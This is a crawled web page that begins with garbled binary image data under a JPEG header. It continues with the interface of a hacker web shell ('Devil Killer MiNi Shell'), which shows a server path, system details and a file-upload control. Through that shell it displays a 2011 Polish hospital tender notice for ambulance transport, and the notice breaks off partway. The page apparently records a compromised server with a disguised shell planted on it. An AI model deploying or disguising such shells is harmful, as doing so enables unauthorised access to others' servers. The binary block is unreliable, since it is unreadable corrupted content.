JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110609/150798-N-2011.html

<p class="kh_header"><b>Knurów: Świadczenie całodobowych usług transportu sanitarnego</b><br>
<b>Numer ogłoszenia: 150798 - 2011; data zamieszczenia: 09.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital w Knurowie Sp. z o.o. , ul. Niepodległości 8, 44-190 Knurów, woj. śląskie, tel. 32 331 93 34, faks 32 331 93 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalknurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie całodobowych usług transportu sanitarnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie całodobowych usług transportu sanitarnego, obejmujące zapewnienie całodobowej gotowości zespołu, realizowanie wezwań i udzielanie usług w zakresie transportu sanitarnego zgodnie z zapotrzebowaniem siedem dni w tygodniu w tym święta i dni ustawowo wolne od pracy. 
Wykonawca zobowiązany jest do wykonywania działalności w zakresie transportu sanitarnego prowadzonej w formie zakładu opieki zdrowotnej (publicznego/niepublicznego) z zarejestrowaną właściwą dla świadczenia usług transportu sanitarnego komórką organizacyjną. 
Przedmiot zamówienia podzielony został na 4 Części:
-	Część I - transport krwi i materiału biologicznego
-	Część II - transport sanitarny pacjentów bez opieki medycznej 
-	Część III - transport sanitarny pacjentów z opieką medyczną - sanitariusz/ratownik medyczny 
-	Część IV - transport sanitarny pacjentów z opieką medyczną - zespół specjalistyczny 
Część I - transport krwi i materiału biologicznego obejmuje:
-	Transport materiału biologicznego
-           Transport krwi
-	Inne świadczenia wymagające karetki transportowej. 
Materiał biologiczny to m.in. krew, preparaty krwiopochodne, materiał do badań laboratoryjnych, wymazy, wycinki badań histopatologicznych. Do transportu krwi i materiałów biologicznych muszą być zastosowane specjalne chłodzone pojemniki (np. lodówki), transport odbywa się na podstawie zlecenia lekarza. 
Środki transportu sanitarnego muszą spełniać wymagania sanitarne i techniczne niezbędne w rodzaju świadczonych usług, spełniać cechy techniczne i jakościowe określone w Polskich Normach przenoszących europejskie normy zharmonizowane (PN EN 1789:2008 i PN EN 1865:2002) oraz spełniać warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003 r. Nr 32 poz. 262 z późn. zm.) oraz ustawy z dnia 30.08.1991 r. o zakładach opieki zdrowotnej (Dz. U. z 2007 r., Nr 14, poz. 89, art. 70a z późn. zm.). Środki transportu powinny spełniać wymogi określone w Rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2011r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011r., Nr 31, poz. 158). Kierowca musi posiadać prawo jazdy kat. B, zaświadczenie uprawniające do prowadzenia pojazdów uprzywilejowanych zgodnie z art. 95a ust. 1 ustawy Prawo o ruchu drogowym oraz ukończony kurs/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów.     
Część II - transport sanitarny pacjentów bez opieki medycznej obejmuje:
-            Przewóz chorych na badania specjalistyczne 
-	Transport chorych ze Szpitala Zamawiającego do miejsca zamieszkania
-	Transport chorych pomiędzy Szpitalami 
-	Transport chorych z podstawowej opieki zdrowotnej w zakresie nocnej i świątecznej opieki zdrowotnej (transport wraz z lekarzem i/lub pielęgniarką Zamawiającego w razie potrzeby),
-	Inne świadczenia wymagające transportu sanitarnego. 
Samochody wyposażone muszą być minimum w:
-	apteczkę pierwszej pomocy,
-	nosze do przewożenia pacjenta w pozycji leżącej,
-	butle z tlenem,
-	miejsce siedzące dla osoby towarzyszącej,
-	odpowiednie oznakowanie,
-	koc, 2 prześcieradła, poduszka,
-	środki opatrunkowe,
-	oraz sprzęt medyczny i aparaturę niezbędną do realizacji umowy.
Środki transportu sanitarnego muszą spełniać wymagania sanitarne i techniczne niezbędne w rodzaju świadczonych usług, spełniać cechy techniczne i jakościowe określone w Polskich Normach przenoszących europejskie normy zharmonizowane (PN EN 1789:2008 i PN EN 1865:2002) oraz spełniać warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003 r. Nr 32 poz. 262 z późn. zm.) oraz ustawy z dnia 30.08.1991 r. o zakładach opieki zdrowotnej (Dz. U. z 2007 r., Nr 14, poz. 89, art. 70a z późn. zm.). Środki transportu powinny spełniać wymogi określone w Rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2011r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011r., Nr 31, poz. 158). Kierowca musi posiadać prawo jazdy kat. B, zaświadczenie uprawniające do prowadzenia pojazdów uprzywilejowanych zgodnie z art. 95a ust. 1 ustawy Prawo o ruchu drogowym oraz ukończony kurs/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów.     
Kierowca zobowiązany będzie do pomocy przy wsiadaniu i wysiadaniu pacjentom z dysfunkcją narządów ruchu. Transport odbywa się na podstawie zlecenia lekarza. Transport pacjentów w pozycji siedzącej lub leżącej. Zamawiający zastrzega sobie prawo do udziału w transporcie pielęgniarki i/lub lekarza Zamawiającego, jeżeli zajdzie taka konieczność.

Część III - transport sanitarny pacjentów z opieką medyczną - sanitariusz/ratownik medyczny obejmuje:
-	Przewóz chorych na badania specjalistyczne 
-	Transport chorych ze Szpitala Zamawiającego do miejsca zamieszkania
-	Transport chorych pomiędzy Szpitalami
-	Inne świadczenia wymagające transportu sanitarnego wraz z opieką medyczną
Środki transportu sanitarnego muszą spełniać wymagania sanitarne i techniczne niezbędne w rodzaju świadczonych usług, spełniać cechy techniczne i jakościowe określone w Polskich Normach przenoszących europejskie normy zharmonizowane (PN EN 1789:2008 i PN EN 1865:2002) oraz spełniać warunki określone w rozporządzeniu Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003 r. Nr 32 poz. 262 z późn. zm.) oraz ustawy z dnia 30.08.1991 r. o zakładach opieki zdrowotnej (Dz. U. z 2007 r., Nr 14, poz. 89, art. 70a z późn. zm.). Środki transportu powinny spełniać wymogi określone w Rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2011r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011r., Nr 31, poz. 158). 
Kierowca musi posiadać prawo jazdy kat. B, zaświadczenie uprawniające do prowadzenia pojazdów uprzywilejowanych zgodnie z art. 95a ust. 1 ustawy Prawo o ruchu drogowym oraz ukończony kurs/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów.  
Sanitariusz musi posiadać ukończony kurs/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów.    
Ratownik medyczny musi posiadać dyplom ratownika medycznego.
Kierowca zobowiązany będzie do pomocy przy wsiadaniu i wysiadaniu pacjentom z dysfunkcją narządów ruchu. Transport pacjentów w pozycji siedzącej lub leżącej na podstawie zlecenia lekarza.

Część IV - transport sanitarny pacjentów z zespołem specjalistycznym obejmuje:
-	transport pacjentów w stanie zagrożenia życia do innych Szpitali
-	transport pacjentów wymagających opieki zespołu specjalistycznego na badania specjalistyczne
-	Inne świadczenia wymagające transportu sanitarnego wraz z zespołem specjalistycznym.
Zespół specjalistyczny w skład którego wchodzą co najmniej trzy osoby uprawnione do wykonywania medycznych czynności ratunkowych, w tym lekarz oraz pielęgniarka lub ratownik medyczny oraz kierowca, w przypadku, gdy żaden z członków zespołu ratownictwa medycznego nie posiada prawa jazdy kategorii B oraz nie spełnia warunków, o których mowa w art. 95a ust. 1 ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. z 2005r., Nr 108, poz. 908, z późn. zm.).
Środek transportu musi spełniać cechy techniczne i jakościowe określone w Polskich Normach przenoszących europejskie normy zharmonizowane zgodnie z przepisami ustawy o Państwowym Ratownictwie Medycznym oraz wymagania dotyczące wyposażenia medycznego zgodnie z aktualnie obowiązującą Polską normą przenoszącą europejskie normy zharmonizowane (PN EN 1789:2008 i PN EN 1865:2002) oraz wytycznymi Ministra Zdrowia określone w Załączniku nr 3 do Zarządzenia Nr 12/2011/DSM Prezesa Narodowego Funduszu Zdrowia z dnia 14 marca 2011r. w sprawie określenia warunków zawierania i realizacji umów w rodzaju ratownictwo medyczne.
Wykonawca musi posiadać uprawnienia do podawania leków odurzających i psychotropowych niezbędnych przy udzielaniu pierwszej pomocy.
Transport pacjentów w pozycji siedzącej lub leżącej na podstawie zlecenia lekarza. 

Wymagania ogólne dotyczące wszystkich Części:
1.	Logistyczne rozplanowanie transportu leży w gestii Wykonawcy, który winien zrealizować usługę prawidłowo, rzetelnie i w określonym czasie. Transport sanitarny ma być realizowany najbliższą możliwie drogą. 
2.	Wykonawca zobowiązany będzie do świadczenia usług będących przedmiotem zamówienia sprawnymi technicznie pojazdami i wykonywania ich z należytą starannością. W przypadku awarii pojazdu Wykonawca zobowiązany będzie we własnym zakresie zapewnić sprawny pojazd zastępczy do ciągłości świadczenia usług będących przedmiotem zamówienia.
3.	Oznakowanie pojazdów sanitarnych powinno być zgodne z obowiązującymi przepisami.
4.	Wykonawca musi posiadać zgodę na używanie sygnałów dźwiękowych i świetlnych dla pojazdów uprzywilejowanych.
5.	Lokalizacja bazy wyjazdowej na terenie województwa śląskiego.
6.	Posiadanie całodobowego centrum dyspozytorskiego z numerami kierunkowymi telefonu z województwa śląskiego.
7.	Pojazdy przeznaczone do realizacji przedmiotu zamówienia winny:
a)	posiadać ubezpieczenie OC i NW,
b)	posiadać aktualne, dopuszczające do ruchu badania techniczne,
c)	posiadać opinię sanitarną o pojeździe.
8.	Wykonawca do każdej faktury dołączy zestawienie wykonanych usług zawierające:
-	numer zlecenia
-	datę realizacji
-	oddział zlecający 
-	nazwisko lekarza zlecającego
-	dane pacjenta
-	trasę transportu (skąd-dokąd) 
-	godziny pracy (wyjazd-powrót) 
-	ilość przejechanych kilometrów
-	 ilość wyjazdów,
-	zlecenie przewozu  wystawione przez lekarza Zamawiającego.
9.	Zamawiający zastrzega sobie prawo niewykorzystania w pełnym zakresie umowy. Niewykorzystanie przez Zamawiającego umowy w pełnym zakresie nie wymaga podania przyczyny oraz nie powoduje powstania obowiązku zapłaty kar umownych i innych odszkodowań z tytułu  niewykonania umowy.
10.	Zamawiający zastrzega sobie prawo w trakcie realizacji niniejszej umowy do zmiany wielkości kilometrów/godzin/wyjazdów do granic kwoty przedmiotowej umowy.
11.	Transport będzie wykonywany ze wszystkich komórek, w których prowadzona jest działalność Szpitala w Knurowie nawet jeśli jeden z oddziałów będzie się znajdował poza siedzibą Zamawiającego.
Przedmiot zamówienia podzielony został na cztery części. Zamawiający nie dopuszcza składania ofert częściowych w ramach danej części. 
Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67  ust. 1 pkt 6 ustawy Pzp.
Zamawiający nie dopuszcza składania ofert wariantowych.
Wymagany termin realizacji zamówienia wynosi 12 miesięcy licząc od daty zawarcia umowy. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej. Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
Zamówienie publiczne o wartości poniżej 193 000 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie tego warunku Wykonawca załączy do oferty oświadczenie, o którym mowa w pkt. 8.1a SIWZ tj. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) - Załącznik Nr 3 - w przypadku składania oferty wspólnej do złożenia w/w dokumentu zobowiązany jest pełnomocnik.
Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie tego warunku Wykonawca załączy do oferty oświadczenie, o którym mowa w pkt. 8.1a tj. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) - Załącznik Nr 3 - w przypadku składania oferty wspólnej do złożenia w/w dokumentu zobowiązany jest pełnomocnik oraz dokument o którym mowa w pkt. 8.1 b SIWZ tj. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie - Załącznik Nr 4.
Zamawiający uzna warunek za spełniony jeżeli Wykonawca (Wykonawcy występujący wspólnie) wykaże się wykonaniem co najmniej dwóch usług rodzajowo zbliżonych do oferowanego przedmiotu zamówienia o wartości nie mniejszej niż:
	- dla Części I - 50 000 zł każda - Załącznik nr 4.
	- dla Części II - 60 000 zł każda - Załącznik nr 4.
	- dla Części III- 70 000 zł każda - Załącznik nr 4.
	- dla Części IV - 150 000 zł każda - Załącznik nr 4.
Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie tego warunku Wykonawca załączy do oferty oświadczenie, o którym mowa w pkt. 8.1a tj. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) - Załącznik Nr 3 - w przypadku składania oferty wspólnej do złożenia w/w dokumentu zobowiązany jest pełnomocnik oraz dokumenty, o których mowa w pkt. 8.1 e SIWZ tj.  Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - wykaz posiadanych środków transportu medycznego (Załącznik Nr 6).
Warunek zostanie uznany za spełniony, jeśli Wykonawca (Wykonawcy występujący wspólnie) wykaże, że posiada:
a)  min. dwa pojazdy do realizacji usługi w zakresie części na którą oferta jest składana. Zamawiający wymaga załączenia do oferty wykazu środków transportu dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami z podaniem rodzaju, marki i numerów rejestracyjnych, dat produkcji, daty ostatniego badania technicznego (Załącznik nr 6). 
Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie tego warunku Wykonawca załączy do oferty oświadczenie, o którym mowa w pkt. 8.1a tj. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) - Załącznik Nr 3 - w przypadku składania oferty wspólnej do złożenia w/w dokumentu zobowiązany jest pełnomocnik oraz dokumenty, o których mowa w pkt. 8.1 c SIWZ tj. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik Nr 5.
Warunek zostanie uznany za spełniony, jeśli Wykonawca (Wykonawcy występujący wspólnie) wykaże, że posiada:
b) personel karetki posiadający odpowiednie kwalifikacje do wykonywania  świadczeń      
      będących przedmiotem umowy w tym:
- dla Części I 
- minimum dwóch kierowców - Kierowca karetki musi posiadać odpowiednie kwalifikacje do wykonywania świadczeń będących przedmiotem umowy i zaświadczenie uprawniające do prowadzenia pojazdów uprzywilejowanych zgodnie z art. 95 a ust. 1 ustawy Prawo o ruchu drogowym oraz ukończony kursu/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów, prawo jazdy kategorii B - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
- dla Części II 
- minimum dwóch kierowców - Kierowca karetki musi posiadać odpowiednie kwalifikacje do wykonywania świadczeń będących przedmiotem umowy i zaświadczenie uprawniające do prowadzenia pojazdów uprzywilejowanych zgodnie z art. 95 a ust. 1 ustawy Prawo o ruchu drogowym oraz ukończony kursu/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów, prawo jazdy kategorii B - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
- dla Część III 
- minimum dwóch sanitariuszy - Sanitariusz musi posiadać ukończony kurs/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
i/lub
- minimum dwóch ratowników medycznych - ratownik medyczny musi posiadać dyplom ratownika medycznego - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
- minimum dwóch kierowców - kierowca karetki musi posiadać odpowiednie kwalifikacje do wykonywania świadczeń będących przedmiotem umowy i zaświadczenie uprawniające do prowadzenia pojazdów uprzywilejowanych zgodnie z art. 95 a ust. 1 ustawy Prawo o ruchu drogowym oraz ukończony kursu/szkolenie w zakresie udzielania podstawowych zabiegów resuscytacyjnych oraz obsługi automatycznych defibrylatorów, prawo jazdy kategorii B - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
 - dla Części IV 
- minimum dwóch lekarzy  - lekarz musi posiadać tytuł specjalisty lub specjalizujący się w dziedzinie medycyny ratunkowej/posiadający specjalizację lub tytuł specjalisty w dziedzinie: anestezjologii i intensywnej terapii, chorób wewnętrznych, chirurgii ogólnej, chirurgii dziecięcej, ortopedii i traumatologii narządu ruchu, ortopedii i traumatologii, lub pediatrii lub co najmniej trzyletni staż pracy w zespołach specjalistycznych transportu sanitarnego - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
- minimum dwie pielęgniarki - pielęgniarka musi posiadać tytuł specjalisty lub specjalizującą się w dziedzinie pielęgniarstwa ratunkowego, anestezjologii i intensywnej opieki, chirurgii, kardiologii, pediatrii/posiadającą ukończony kurs kwalifikacyjny w dziedzinie pielęgniarstwa ratunkowego, anestezjologii i intensywnej opieki, chirurgii, kardiologii, pediatrii oraz posiadającą co najmniej 3-letni staż pracy w oddziałach tych specjalności, oddziałach pomocy doraźnej, izbach przyjęć lub pogotowiu ratunkowym - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
i/lub 
- minimum dwóch ratowników medycznych - ratownik medyczny musi posiadać dyplom ukończenia studiów wyższych na kierunku (specjalności) ratownictwo medyczne lub dyplom ukończenia publicznej szkoły policealnej lub niepublicznej szkoły policealnej o uprawnieniach szkoły publicznej i posiada dyplom potwierdzający uzyskanie tytułu zawodowego ratownik medyczny lub dyplom wydany w państwie innym niż: państwo członkowskie Unii Europejskiej, Konfederacja Szwajcarska lub państwo członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA) lub posiada kwalifikacje do wykonywania zawodu ratownika medycznego nabyte w państwie członkowskim Unii Europejskiej, Konfederacji Szwajcarskiej lub państwie członkowskim Europejskiego Porozumienia o Wolnym Handlu (EFTA) - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
i/lub  
- minimum dwóch kierowców - kierowca, w przypadku, gdy żaden z członków zespołów ratownictwa medycznego nie posiada prawa jazdy kategorii B oraz nie spełnia warunków, o których mowa w art. 95a ust. 1 ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. z 2005r., Nr 108, poz. 908, z późn. zm.) - do oferty należy załączyć dokumenty potwierdzające ww. kwalifikacje.
Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
